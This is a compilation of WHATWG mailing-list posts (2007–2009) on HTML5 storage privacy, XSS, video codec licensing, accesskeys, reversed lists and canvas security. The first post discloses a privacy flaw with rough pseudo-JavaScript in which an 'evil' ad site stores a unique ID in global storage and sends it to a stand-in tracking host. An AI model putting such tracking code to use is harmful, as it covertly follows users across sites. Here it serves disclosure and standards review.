[whatwg] Potenial Security Problem in Global Storage Specification

2007-05-30 Thread Jerason Banes

Hello All!

This is my first post here, so apologies in advance if I'm not quite up on
the list etiquette.

I was just comparing the Storage API with that of the Google
Gearshttp://gears.google.com,
and something jumped out at me. According to the spec, browsers should allow
a webapp to store data in the globalStorage object with no domain attached.
(i.e. globalStorage['']) This is intended to allow data to be shared across
all webpages.

My concern is that this poses a problem for the user's privacy. Let's say
that I'm an Evil Advertisement site. It is in my interest to penetrate the
user's veil of privacy and determine which pages they visit. I've
traditionally used cookies for this, but the browser makers foiled my
attempts by allowing cookies to only be accepted from the originating site.
But thanks to the new globalStorage API, I can store a Unique ID in the
user's browser, then use Javascript to retrieve it every time they download
one of my ads.

Here's some rough psuedo-js to demonstrate how it might work:

script
if(!gloabalStorage[''].evilbit) gloabalStorage[''].evilbit = createUUID();

var createUUID()
{
   //return a unique identifier using a random algorithm.
}

var displayEvilAd(type)
{
   document.write('img src=http://www.eviladagency.com' +
   '/getAdvertisement.asp' +
   '?type=' + type +
   'tracking=' + gloabalStorage[''].evilbit+'');
}
/script

...

scriptdisplayEvilAd(banner);/script

Is there something I'm missing that would prevent this?

Thanks,
Jerason Banes


Re: [whatwg] Potenial Security Problem in Global Storage Specification

2007-06-01 Thread Jerason Banes

On 6/1/07, Gervase Markham [EMAIL PROTECTED] wrote:


Ian Hickson wrote:
 Yeah, this is mentioned in the security section:

http://www.whatwg.org/specs/web-apps/current-work/#security5

 ...along with recommended solutions to mitigate it.

All of those mitigation measures seem to be non-ideal.



I disagree. The third item in the list describes the solution which I had in
mind:

Blocking access to the top-level domain
(publichttp://www.whatwg.org/specs/web-apps/current-work/#public0)
storage areas: user agents may prevent domains from storing data in and
reading data from the top-level domain entries in the
globalStoragehttp://www.whatwg.org/specs/web-apps/current-work/#globalstorageobject.
For example, content at the domain
www.example.com would be allowed to access example.com data but not  comdata.

That effectively restricts the storage to a single domain and is in line
with how cookies work today.

Have any browser makers expressed opinions on which of them they are

planning to implement?



That's a good question, but I'm not sure if it's one that the WHATWG can
answer? I do know that Firefox 2 already implements the Storage spec. Info
on that here:

http://developer.mozilla.org/en/docs/DOM:Storage

I wasn't able to find any docs that describe the Storage security model used
in Gecko, so I ran a few tests. What I found was that any attempt to access
globalStorage[''] or globalStorage['com'] from the context of a website
resulted in a security error. You can try the test for yourself here:

http://java.dnsalias.com/temp/storage.html

After loading the page, open the Javascript Error console. You should see a
security exception listed.

I presume that the restrictions are relaxed for signed pages as well as
those that are run at a higher privilege level. (e.g. XULRunner apps.)

Is there a document somewhere outlining the actual benefits of this

feature, even as potentially restricted?



The specification has this explanation: Web applications may wish to store
megabytes of user data, such as entire user-authored documents or a user's
mailbox, on the clientside for performance reasons.

And it's not just performance reasons. If I wanted to work on a Google
Spreadsheet on a plane, for example, offline caching of the data would allow
me to continue my work without an internet connection. Then when I reconnect
to the internet and load the document, the client would sync its stored
changes with the server.

My understanding is that this is Google's justification for their new
Gears product. Which is basically the same as the WHATWG Storage +
Database specifications, but with auto-sync and an incompatible API.

Thanks,
Jerason


Re: [whatwg] On separation of code and data

2007-06-07 Thread Jerason Banes

You may know this already, but the on* handlers have been deprecated and
replaced with the DOM 2 Events* standard. So instead of doing 'onclick =
DoFunction()' the programmer should be calling
element.addEventListener('click',
DoFunction, false). If I understand you correctly, this effectively
achieves your no code in data request. At least as far as the standards
go.

For what it's worth, I'm not certain that keeping code and data separate
fixes the security issues with XSS. For example, Fortify Software released a
Javascript exploit that inlines JSON requests as a simple 'script
src=/path/to/AJAX.json/script' tag, then captures the data present in
the object created.

You can read about the full exploit here:

http://www.fortifysoftware.com/servlet/downloads/public/JavaScript_Hijacking.pdf

Such problems go above and beyond the issues present in mixing code with
data, and therefore require more sophisticated security models.

Thanks,
Jerason

* Microsoft has yet to fully support the DOM 2 standard. As a result, IE
does not support addEventListener. It does support
element.attachEvent('onclick',
DoFunction) which effectively achieves the same goal.

On 6/7/07, Pieter Ceelen [EMAIL PROTECTED] wrote:



Thus instead of creating

index.html
 a href=# onclick=DoFunction() id=123 

we write
index.html
 a href=#  id=123 

index.js
  document.getElementById('123').onclick=DoFunction()



Re: [whatwg] The issue of interoperability of the video element

2007-06-26 Thread Jerason Banes

I believe an aim of whatwg is a viable implementable standard that
reflects the realities of the web while encouraging innovation. MPEG4
is part of the web (a growing part too).




If I may, I'd like to echo Timeless's point here. I've been watching this
thread with great interest and believe I understand both sides of the issue.
Theora is appealing because it provides a Free as in no-cost to implement
and Free as in no-encumbrances solution. However, it also provides a
solution that nobody uses today. Perhaps even worse, there doesn't seem to
be a lot of interest in adopting Theora in the future.

And can you blame web users? Theora provides a solution that's high
bandwidth and low quality. A very unappealing prospect for the
bandwidth-constrained environment of the web.Thus more competitive solutions
like MPEG4, WMV, RealPlayer, and Quicktime have been dominating the web. The
most popular form of video streaming at the moment is actually the
H.263codec through Flash; a non-free codec which is running on a
platform that
can only roughly be considered a standard.

If and when the Dirac
http://en.wikipedia.org/wiki/Dirac_%2528codec%2529codec is
completed, there will be a viable alternative to the non-free video
codec problem that might justify the risk/reward equation for support. Until
then, however, we're going to need to look at supporting the existing
infrastructure. That infrastructure is based on the following options:

  - VP6
  - Windows Media Video
  - MPEG4
  - RealVideo 30/40
  - H.263
  - Quicktime Sorenson

Out of those solutions, VP6, WMV, Sorenson, and RealVideo can immediately be
discarded for their lack of standardization. That leaves H.263 and MPEG4 as
the only viable options.

H.263 is not a bad choice, IMHO. It's well supported by nearly every major
video player, has a variety of library implementations available, is in
widespread usage, and has a good tradeoff between bandwidth and quality. It
is also a standard under the ITU-T.

But what about MPEG4? Specifying MPEG4 has a lot of appeal for both its
excellent encoding performance and its single point to obtain licensing and
indemnity from. Furthermore, MPEG4 has its own container format and
low-bandwidth audio encoding scheme. (AAC is a sight better than having to
dictate ADPMC sound.) MPEG4 is also widely supported by media players,
though not quite as well as H.263. The MPEG Group also offers low-cost (i.e.
free) licensing to anyone shipping less than 50,000 units a year, which
means that it would be feasible for upstart browsers to support the
standard.

That being said, I think I prefer the H.263 standard as a video baseline for
a few reasons:

  1. It presents several licensing options. The implementer can chose to
  get indemnity via an available license like MPEG4-Simple (which will play
  H.263), choose to try and deal with individual patent holders, or
  simply attempt to ignore the issue. (The last case is particularly appealing
  in countries that don't recognize the patents related to streaming video
  technologies.)
  2. It's amazingly well supported both in hardware and software. Future
  mobile devices should have no trouble adding support for H.263.
  3. It's already the most popular codec on the web today. While Real
  has retired their H.263-based codecs, it still lives on in Adobe FLV
  files.
  4. Java decoders are available for creating shunts for browsers that
  don't currently support the video tag.

That leaves me with two (point 5) questions:

  1. Would this place too much of a burden on browsers like Mozilla and
  Opera? Could plugins to local OS codecs or media players slide around the
  licensing issues?
  2. Is there a good choice for container format that wouldn't
  additionally burden the implementors?

Thanks,
Jerason


Re: [whatwg] The issue of interoperability of the video element

2007-06-26 Thread Jerason Banes

Hi Charles,

While I agree with your sentiment, I don't see a better option. The purpose
of the HTML5 spec is to provide a unified web applications platform that
supports the existing web in a practical manner. If the spec sticks with
Theora as the baseline implementation, it runs the risk of no one
implementing that part of the specification. If no one implements the Theora
codec, then the attempts to standardize the video tag will be all for
naught.

At the end of the day, I think the decision will come down to one of two
options:

  - The spec can specify Theora as the baseline, very few browsers will
  implement it, few users will use it (due to a lack of support), and thus the
  intent of standardizing on a free format will be lost.
  - The spec can be practical about implementing the video tag and
  specify H.263 or MPEG4 as a baseline. Existing multimedia toolkits can
  be reused in implementation and thus all browsers can support the standard.
  Users will use the format thanks to ubiquitous support. The tax will be a
  non-issue in most cases despite leaving a bad taste in the standard
  committee's mouth. Up and coming browsers can choose not to implement that
  part of the standard if they so choose or piggyback on an existing media
  player's licensing.

I personally think that having a non-free standard implemented in all
browsers is preferable to having a free standard implemented in none.
Otherwise, what is this tag being standarded for? We already have a mishmash
of options available through the embed and object tags.

It also occurs to me that the market is likely to define a format like MPEG4
as the standard whether the WHATWG wants it to or not. If the
least-common-denominator across browsers is MPEG4 (for example), then why
would the market embrace spotty support for theora? The practical solution
will win out regardless of what is decided here. Which will force new
browsers to support a pseudo-standard rather than a real standard, anyway.
Exactly the type of thing that the WHATWG was formed to prevent.

Thanks,
Jerason

On 6/26/07, Charles Iliya Krempeaux [EMAIL PROTECTED] wrote:


Hello Jerason,

From a technical point-of-view, you make a very good argument.

However, I think it is inappropriate for the HTML spec to (directly or
indirectly) mandate people pay to implement it.

As you point out, H.263 is encumbered by patents and has licensing
costs associates with it. Costs that me, you, tool creators, and users
will have to pay, either directly or in-directly

This just makes things more expensive for everyone since we are
essentially being taxed. And it's ridiculous to just accept this tax
when there's no reason we have to.


See ya

--
Charles Iliya Krempeaux, B.Sc. http://ChangeLog.ca/


  All the Vlogging News on One Page
 http://vlograzor.com/


On 6/26/07, Jerason Banes [EMAIL PROTECTED] wrote:


  I believe an aim of whatwg is a viable implementable standard that
  reflects the realities of the web while encouraging innovation. MPEG4
  is part of the web (a growing part too).
 


 If I may, I'd like to echo Timeless's point here. I've been watching
this
 thread with great interest and believe I understand both sides of the
issue.
 Theora is appealing because it provides a Free as in no-cost to
implement
 and Free as in no-encumbrances solution. However, it also provides a
 solution that nobody uses today. Perhaps even worse, there doesn't seem
to
 be a lot of interest in adopting Theora in the future.

 And can you blame web users? Theora provides a solution that's high
 bandwidth and low quality. A very unappealing prospect for the
 bandwidth-constrained environment of the web.Thus more competitive
solutions
 like MPEG4, WMV, RealPlayer, and Quicktime have been dominating the web.
The
 most popular form of video streaming at the moment is actually the H.263
 codec through Flash; a non-free codec which is running on a platform
that
 can only roughly be considered a standard.

 If and when the Dirac codec is completed, there will be a viable
alternative
 to the non-free video codec problem that might justify the risk/reward
 equation for support. Until then, however, we're going to need to look
at
 supporting the existing infrastructure. That infrastructure is based on
the
 following options:

 VP6
 Windows Media Video
 MPEG4
 RealVideo 30/40
 H.263
 Quicktime SorensonOut of those solutions, VP6, WMV, Sorenson, and
RealVideo
 can immediately be discarded for their lack of standardization. That
leaves
 H.263 and MPEG4 as the only viable options.

 H.263 is not a bad choice, IMHO. It's well supported by nearly every
major
 video player, has a variety of library implementations available, is in
 widespread usage, and has a good tradeoff between bandwidth and quality.
It
 is also a standard under the ITU-T.

 But what about MPEG4? Specifying MPEG4 has a lot of appeal for both its
 excellent encoding performance and its single point

Re: [whatwg] The issue of interoperability of the video element

2007-06-26 Thread Jerason Banes

On 6/26/07, Maik Merten [EMAIL PROTECTED] wrote:


Opera and Mozilla already have implemented (early) Ogg Vorbis and Ogg
Theora support.



And (if this thread is any indication) are likely to be the only ones.
Internet Explorer still holds the majority of the market, and Safari is
still the predominant browser in the Mac market.

Plus what is lack of support? Encoding apps for Ogg Theora are

available on basically every platforms, as are players (yes, even
Windows Media Player and QuickTime player can play it with the fitting
components installed, same goes for RealPlayer). It's absolutely trivial
to encode content for it.



The same can be said for H.263 and MPEG4. Linux machines can play these
codecs with no issues as long as the codecs are installed separate from the
distro itself. The question that I hate to ask (because it goes against my
own grain to ask it) is, which is more useful to the web market: Asking
Windows users to install Ogg/Theora codecs or asking Linux users to install
H.263 codecs? Given that Linux has an extremely small desktop share
consisting of expert users, I'm forced to answer that they would be far less
impacted by a baseline support of H.263 than Windows users will be impacted
by a baseline support of Theora.

Free Software like Mozilla cannot implement MPEG4 or H.263 and still

stay free. The tax *is* an issue because you can't buy a community
license that is valid for all uses.



Indeed. That's why I asked how feasible it is for these browsers to plug
into underlying media players? On windows that would be WMP, Quicktime on
Macs, and libavcodec on Linux/Unix.

Plus even if you implement H.263 or MPEG4 video - what audio codec

should be used with that? Creating valid MPEG streams would mean using a
MPEG audio codec - that'd be e.g. MP3 or AAC. Additional licensing costs
and additional un-freeness.



Correct me if I'm wrong, but that depends on the container format, doesn't
it? If we use the MPEG container format, then yeah. MP3 is pretty much a
guaranteed necessity. However, I am not aware of any encumbrances (*grits
teeth again*) with the AVI container format. Which would allow for a
less-performant baseline like an ADPCM format, which is at least an open
standard.

Of course, I'm probably going to have to bow to my own argument and agree
that the market would never accept such a low audio baseline. Which means
that something like MP3 or AAC would indeed be a requirement.

Don't get me wrong: MPEG technology is nice and well performing - but

the licensing makes implementations in free software impossible (or at
least prevents distribution in e.g. Europe or North America).



It is a difficult conundrum. If the WHATWG specifies theora, then it runs
the risk of being ignored. If it specifies an existing format then it runs
the risk of locking out some small cross-section of users. My argument is
based around the devil you know approach that the WHATWG has otherwise
adopted in its standards. It rubs me the wrong way to suggest it, but I
don't see any other way of ensuring that HTML5 video would become as
ubiquitous as FLV video has become.

Thanks,
Jerason


Re: [whatwg] So called pre-exising use by large companies

2007-12-12 Thread Jerason Banes
Here's a rundown of the major media players and their support:

Windows Media - Requires third party pluginhttp://www.illiminable.com/ogg/
Quicktime 7 - Requires Xiph.org plugin http://xiph.org/quicktime/
Real Player - Requires Helix pluginhttps://helixcommunity.org/frs/?group_id=7

In effect, no major media player supports Theora out of the box. It's
interesting to note that MPEG, H.263, and MPEG4/H.264 are far more
standard across media players. Which, I think, means that the spec should
recommend support for these formats.

However, a variety of good points were raised in a thread a few months back.
What you effectively have here is if you choose a free format that anyone
can implement, you alienate the commercial implementations due to their
due-diligence fears.

(Which, as an aside, are justified when it comes to media technology. This
stuff is so mired in patents, it isn't even funny. H.263 was intended to be
an open spec that anyone could implement at no cost. It didn't take long
for patents to start coming out of the woodwork and effectively close the
format off.)

On the other hand, if you choose commercially supported formats like
MPEG/MPEG4, you run into the issue that the free software camp is afraid
of being unable to produce a GPL-compliant version FFMPEG exists, but
distros are not legally able to ship it. The user has to download and
install it after the fact, in a psuedo-legal workaround.

Both sides argue that users can download a simple plugin which will make
either possible standard work. Which is true, but it ignores the fact that
Flash ships with the H.263 codec by default and is kicking everyone's sorry
asses in the online video space. As long as Flash has a consistent video
format that everyone can use and HTML 5 doesn't, Flash is going to be the
defacto standard.

I don't think there are any easy answers here. About the best solution I can
come up with is to provide browser detection of media formats. That way web
developers can do a runtime test for a media format and tell the user Hey,
you need to install a plugin if the format chosen by the website is not
available. Since the vast majority of computers have MPEG4 support, that
will likely become the resulting standard like JPGs and GIFs.

If enough people push long enough and hard enough for Theora, it will become
a new standard alongside these existing formats, much like PNG. Especially
if a few major web browsers ship Theora support long enough to assuage fears
over its unknown patent status.

Thanks,
Jerason Banes

On Dec 12, 2007 6:00 AM, Sanghyeon Seo [EMAIL PROTECTED] wrote:

 From what I read, it is argued, that pre-existing use by large
 companies is a good indication of less risk for submarine patents.

 It is also argued, that Theora has not much pre-exsting use by large
 companies, and among others, H.264 does.

 Is this really true? I have a hard time believing that no large
 companies shipped Theora decoder ever. And how large is large? I
 would appreciate any information on this matter.

 --
 Seo Sanghyeon



Re: [whatwg] arrggghhh (or was it ogg)

2007-12-12 Thread Jerason Banes
If by Corporate Blessed, you mean codecs like H.264, there's a very simple
answer to that. Nokia and Apple pay licensing fees to a company called MPEG
LA. MPEG LA indemnifies Nokia and Apple from patent lawsuits over the use of
MPEG-related codecs. Should anyone come forward with a new patent, the MPEG
LA will litigate the matter and/or come to an agreement with the patent
holder to license the patent on behalf of their member companies.

http://en.wikipedia.org/wiki/H.264#Patent_licensing

Thanks,
Jerason Banes

On Dec 12, 2007 7:15 AM, Joseph Daniel Zukiger 
[EMAIL PROTECTED] wrote:

 What guarantees do Apple, Nokia, et. al. offer that
 their corporate-blessed containers/formats/codecs are
 free from threat for (ergo) the rest of us? Are they
 willing to make binding agreements to go to bat for
 _us_ in court?


Re: [whatwg] several messages regarding Ogg in HTML5

2007-12-12 Thread Jerason Banes
(I've been watching the emails fly around with great interest, but there has
been a rather significant volume. You'll have to forgive me if the following
question has already been answered.)

It seems to me that the argument keeps coming back to the fact that H.264/AAC
has patent protection available while Theora/Vorbis does not. Thanks to the
efforts of the MPEG-LA, Nokia, Apple, and even Microsoft can sleep well at
night.

However, this raises a question in my mind. MPEG-LA is the administrator of
a variety of patent portfolios. Not just the MPEG sphere of patents, but
also IEEE 1394 and DVB-T. They are also working to add patent portfolios for
VC-1, ATSC, DVB-H, and Bluray. Which means that they are well-equipped to
provide patent administration and indemnification for a wide variety of
formats.

*Has anyone asked MPEG-LA if they'd be willing to provide indemnification
for Vorbis/Theora?* While I understand that there is no actual patents to
license at this time, a fee to MPEG-LA (enough to cover possible patents in
the future + MPEG-LA's standard profit margin) for protection against
submarine patents could very well solve this impasse.

Any thoughts?

Jerason Banes

On Dec 11, 2007 3:40 PM, Ian Hickson [EMAIL PROTECTED] wrote:

 In the absence of IP constraints, there are strong technical reasons to
 prefer H.264 over Ogg. For a company like Apple, where the MPEG-LA
 licensing fee cap for H.264 is easily reached, the technical reasons are
 very compelling.


Re: [whatwg] accesskey

2008-01-25 Thread Jerason Banes
Long story short, accesskeys were an idea that worked better on paper than
they did in practice. They inevitably interfered with normal browser
operation as well as other accessibility features in such a way as to *
reduce* the accessibility of many web pages.

The intended replacement is the XHTML Role Access
Modulehttp://www.w3.org/TR/2005/WD-xhtml2-20050527/mod-role.html#s_rolemodule.
It works in a manner similar to accesskeys, but attempts to resolve some of
the original shortcomings. I'm afraid I'm not intimately familiar with it,
but I believe it also resolves the original multi-mapping problem you
brought up.

A few links on the subject:

http://www.cs.tut.fi/~jkorpela/forms/accesskey.html

The original version of this document had a much more positive attitude to
 the accesskey attribute. Experience and analysis has shown, however, that
 the idea of author-defined shortcuts is generally not useful on the Web.
 Moreover, serious damage is often caused by the way in which the attribute
 has been implemented in browsers: it uses key combinations that override
 built-in functionality in browsers and other software.

 Unfortunately, browser support to the attribute is limited, and rather
 primitive. The accesskey attribute tends to mask out the functionality of
 a browser's predefined keyboard control, which is often much more important
 than page-specific access keys. Moreover, browsers do not indicate that
 access keys are available.



http://en.wikipedia.org/wiki/Access_keys

In the summer of 2002, a Canadian Web Accessibility consultancy did an
 informal survey to see if implementing accesskeys caused issues for users of
 adaptive technology http://en.wikipedia.org/wiki/Adaptive_technology,
 especially screen reading technology used by blind and low vision users.
 These users require numerous keyboard shortcuts to access web pages, as
 pointing and clicking a mouse is not an option for them. Their research
 showed that most key stroke combinations did in fact present a conflict for
 one or more of these technologies, and their final recommendation was to
 avoid using accesskeys altogether.

 The World Wide Web Consortium http://www.w3.org/, the organization
 responsible for establishing internet standards, has acknowledged this
 short-coming, and in their latest draft documents for a revised web
 authoring language (XHTML 2http://www.w3.org/TR/2005/WD-xhtml2-20050527/),
 they have deprecated (retired) the ACCESSKEY attribute in favor of the XHTML
 Role Access 
 Modulehttp://www.w3.org/TR/2005/WD-xhtml2-20050527/mod-role.html#s_rolemodule
 .


http://www.wats.ca/show.php?contentid=32

*So while it seems that Accesskeys is a great idea in principle,
 implementation brings with it the possibility that it either will not be
 available to all users, or that the keystroke combination encoded within the
 web page may conflict with a reserved keystroke combination in an adaptive
 technology or future user agent.*

 This potential problem was subsequently brought to the attention of the
 Canadian Common Look and Feel Access Working Group (who had previously
 suggested the use of Accesskeys M, 1 and 2), and after consideration the
 Access Working Group reversed it's recommendation and now suggest *not* to
 use Accesskeys on Government of Canada Web sites.


Thanks,
Jerason

On Jan 25, 2008 10:43 PM, Jean-Nicolas Boulay Desjardins 
[EMAIL PROTECTED] wrote:

 Why are there removing accesskey?
 http://www.w3.org/TR/html5-diff/#absent-attributes

 I though it was recommended to be used by WAI...

 What are we should we use? Because its not said what accesskey is replace
 with...



Re: [whatwg] Reverse ordered lists

2008-01-25 Thread Jerason Banes
To add to what Christoph is saying, perhaps there's a better way to look at
this problem? A reverse list has both a start and an end, just like any
other list. The key is that it's displayed in the opposite order of a
regular list.

This raises the question, why does the list need to be *serialized* in
reverse order? Given that it's a display attribute, wouldn't it make more
sense to force the UA into rendering the list in reverse? e.g.:

ol style=order: reverse;
lione/li
litwo/li
lithree/li
lifour/li
lifive/li
/ol

Which would then render like this:

5. five
4. four
3. three
2. two
1. one

This also solves the partial render problem as the list would partial render
as follows.

Step 1:

1. one

Step 2:

2. two
1. one

Step 3:

3. three
2. two
1. one

Step 4:

4. four
3. three
2. two
1. one

Step 5:

5. five
4. four
3. three
2. two
1. one

Obviously this solution puts a bit more of the onus on the User Agent to
render the list correctly, but I think it's semantically more correct than
trying to encapsulate the display data in the DOM ordering. This also
provides backward compatibility as UAs that don't understand the reverse
attribute will still number the list correctly. (Whereas the previous
solutions would result in the numbering being reversed in older browsers.)

Thanks,
Jerason

On Jan 25, 2008 11:29 AM, Christoph Päper [EMAIL PROTECTED]
wrote:

 Simon Pieters:
  It was pointed out to me that the start='' attribute (and the
  corresponding DOM attribute) currently defaults to 1. This could,
  AFAICT, reaonably trivially be changed to make it depend on the
  direction of the list and the number of li children.

 Or you would introduce an |end| attribute, because 'start' is not the
 same as 'first'...

 I think it has been shown, that the meta attribute |reverse| would
 not work in HTML, it would have to be a command attribute, i.e. it
 doesn't describe the ordering of the following list items, but their
 indended display. This would make it presentational and thereby not
 suitable for HTML. It would belong into CSS, but that isn't very good
 at reordering boxes.



Re: [whatwg] [canvas] imageRenderingQuality property

2008-06-03 Thread Jerason Banes
If you don't mind someone weighing in who's been working with the Nintendo
Wii for the past year and a half, I have found that the quality setting in
Flash is tremendously useful. While the march of Moore's law has ensured
that Flash on the desktop is zippy, it has also created a gap whereby
smaller devices are powerful enough to compete with last generation
desktops. For these devices, the quality setting is more than a nice to
have. It's absolutely critical to obtaining decent performance.

The algorithm's I've used over on WiiCade automatically adjust for high
quality when on the desktop, and low to medium quality when on the Wii. This
provides a more consistent experience to users of both systems. In addition,
many game provide a quality setting in their options screen. (Similar to the
rendering features options in most 3D games.) This allows the user to adjust
the rendering speed manually if he finds his system is too slow or the game
in question is more than fast enough on the Wii.

I can see a quality setting in Javascript used in much the same way. The
site would set the quality of the rendering based on knowledge of particular
platforms. Modern desktops would default to highest quality. Furthermore,
video games (and we all know that's going to be a huge use of Canvas at some
point ;-)) that push the limit of Canvas may allow the user to shift down
as it were to compensate for their slower machine or the slow Canvas
rendering of their browser.

I definitely think this setting should be a hint rather than a hard and fast
set of rules. If a UA (especially desktop UAs) wants to ignore the setting,
that's fine. It will cause no appreciable damage. But it will allow for
slower UAs to be tuned for usage. e.g. If I'm looking at charts on my Wii,
I'd rather they be high quality. If I'm playing a video game, the quality
simply does not matter as much.

I hope you will all keep we poor device users in mind when you come to your
decision.

Thanks!
Jerason Banes

On Mon, Jun 2, 2008 at 5:52 PM, Oliver Hunt [EMAIL PROTECTED] wrote:


  Neither of these apply if the property were just a hint, but now you have
 to think about what happens to content that uses this property in 18 months
 time.  You've told the UA to use a low quality rendering when it may no
 longer be necessary, so now the UA has a choice it either always obeys the
 property meaning lower quality than is necessary so that new content
 performs well, or it ignores the property in which case new content performs
 badly.


 If the quality knob is no longer necessary, why would new content perform
 badly?

 The issue is not that certain operations are slower than others, the issue
 is that anything that requires the developer to choose between
 performance/quality is going to become obsolete as the performance trade
 offs are constantly moving and are not the same from UA to UA, from platform
 to platform.  I think the issue of performance is a complex one that will
 not benefit in the long term from a simple on off switch.  Conceivably we
 could introduce new rendering primitives, such as CanvasSprite, CanvasLayer,
 or some such which would, i suspect, provide a similar benefit, but be more
 resilient in the face of changing performance characteristics.



Re: [whatwg] Canvas origin-clean should not ignore Access Control for Cross-Site Requests

2009-03-13 Thread Jerason Banes
I think this is an excellent point. I've been playing with the Chroma-Key
replacement trick demonstrated in FireFox 3.1b3:
https://developer.mozilla.org/samples/video/chroma-key/index.xhtml
https://developer.mozilla.org/En/Manipulating_video_using_canvas

For my own experiments, I grabbed a green-screen video from Youtube and
converted it to OGG. If the access control were in place for Canvas, I could
have done direct compositing on an embedded video from TinyVid. Which would
open up some interesting possibilities for video mashups on the web.

Thanks,
Jerason

On Fri, Mar 13, 2009 at 11:24 AM, Hans Schmucker hansschmuc...@gmail.comwrote:

 This problem recently became apparent while trying to process a public
 video on tinyvid.tv:

 In article 4.8.11.3 Security with canvas elements, the origin-clean
 flag is only set depending on an element's origin. However there are
 many scenarios where an image/video may actually be public and
 actively allowing processing on other domains (as indicated by
 Access-Control-Allow-Origin).

 Is this an oversight or is there a specific reason why Access Control
 for Cross-Site Requests should not work for Canvas?